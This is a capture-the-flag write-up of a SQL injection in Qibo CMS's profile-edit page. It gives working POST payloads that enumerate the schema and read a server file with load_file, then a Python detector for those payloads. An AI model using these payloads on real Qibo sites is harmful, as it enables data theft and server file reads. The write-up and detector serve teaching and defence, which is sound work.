1 Information gathering
The target is a site built on a CMS, so the first step is to identify which one. A Baidu search shows it is the 齐博CMS (Qibo CMS) full-site system: http://v7.qibosoft.com/
Next, gather information on which vulnerabilities this CMS has had:
2 Exploitation
In short, there is a SQL injection when a user edits their profile information.
Following the original researcher's description, I wrote payloads to exploit it:
0- Register a user and note the uid and email.
1- Error test:
url:
http://4acd6fb999684befb6f3dec5f31047d93fd33c52724f45b7.game.ichunqiu.com/member/userinfo.php?job=edit&step=2
# email is the email used at registration
POST:
truename=xxxx%0000&Limitword[000]=&email=<registered email>&provinceid=
2- Add the injection:
url:
http://4acd6fb999684befb6f3dec5f31047d93fd33c52724f45b7.game.ichunqiu.com/member/userinfo.php?job=edit&step=2
POST data:
truename=xxxx%0000&Limitword[000]=&email=<registered email>&provinceid= , address=(select version()) where uid = 3 %23
3- Enumerate tables:
POST data:
truename=xxxx%0000&Limitword[000]=&email=<registered email>&provinceid= , address=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where uid = 3 %23
4- Enumerate column names:
POST data:
truename=xxxx%0000&Limitword[000]=&email=<registered email>&provinceid= , address=(select group_concat(distinct(column_name)) from information_schema.columns where table_name = (select distinct(table_name) from information_schema.tables where table_schema = database() limit 1) ) where uid = 3 %23
No flag is visible directly, so the only option left is load_file.
5- Payload
A scan shows a flag.php in the site's root directory.
Read this file with the load_file function: /var/www/html/flag.php
truename=xxxx%0000&Limitword[000]=&email=<registered email>&provinceid= , address=(select load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870) ) where uid = 3 %23
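As an added defensive example (not from this writeup or from the CMS itself), the following Python inspects profile-update request bodies the way a WAF rule or application log monitor would, looking for the markers the payloads above leave behind: the extra column assignment riding on the UPDATE, the subselect, the trailing comment terminator and the hex-encoded path passed to load_file. The request bodies are constructed samples modelled on the payloads in the writeup; the rule names and thresholds are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample bodies modelled on the userinfo.php?job=edit&step=2 requests above:
# the first is a benign profile edit, the other two carry the injection.
SAMPLE_BODIES = [
    "truename=alice&Limitword[000]=&email=alice%40example.com&provinceid=3",
    "truename=xxxx%0000&Limitword[000]=&email=a%40b.c&provinceid= , address=(select version()) where uid = 3 %23",
    "truename=xxxx%0000&Limitword[000]=&email=a%40b.c&provinceid= , address=(select load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870) ) where uid = 3 %23",
]

# (rule name, pattern); each is applied to every percent-decoded parameter value.
RULES = [
    ("extra-column-assignment", re.compile(r",\s*\w+\s*=")),          # ", address=" appended to an UPDATE ... SET
    ("subselect", re.compile(r"\(\s*select\b", re.I)),
    ("where-clause", re.compile(r"\bwhere\s+\w+\s*=", re.I)),          # attacker-supplied "where uid = 3"
    ("comment-terminator", re.compile(r"(#|--\s)")),                   # %23 decodes to '#'
    ("schema-enum", re.compile(r"information_schema\.", re.I)),
    ("file-read", re.compile(r"\bload_file\s*\(", re.I)),
    ("hex-literal", re.compile(r"\b0x[0-9a-f]{8,}\b", re.I)),           # hex-encoded path avoids quotes
    ("null-byte", re.compile(r"\x00")),                                 # truename=xxxx%00...
]


def inspect_body(body: str) -> dict:
    """Return {parameter: [rule names]} for every parameter whose value trips a rule."""
    findings = {}
    # keep_blank_values so that an empty provinceid= is still seen; parse_qs splits on the first '='
    for param, values in parse_qs(body, keep_blank_values=True).items():
        hits = []
        for value in values:
            hits += [name for name, rx in RULES if rx.search(value) and name not in hits]
        if hits:
            findings[param] = hits
    return findings


def is_injection(body: str, min_rules: int = 2) -> bool:
    """Alert when one parameter trips at least min_rules rules; a single hit alone is too noisy."""
    return any(len(hits) >= min_rules for hits in inspect_body(body).values())


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(is_injection(body), inspect_body(body))
```

The threshold keeps a lone comma or '#' in a street address from alerting, while the injected provinceid value trips four or more rules at once.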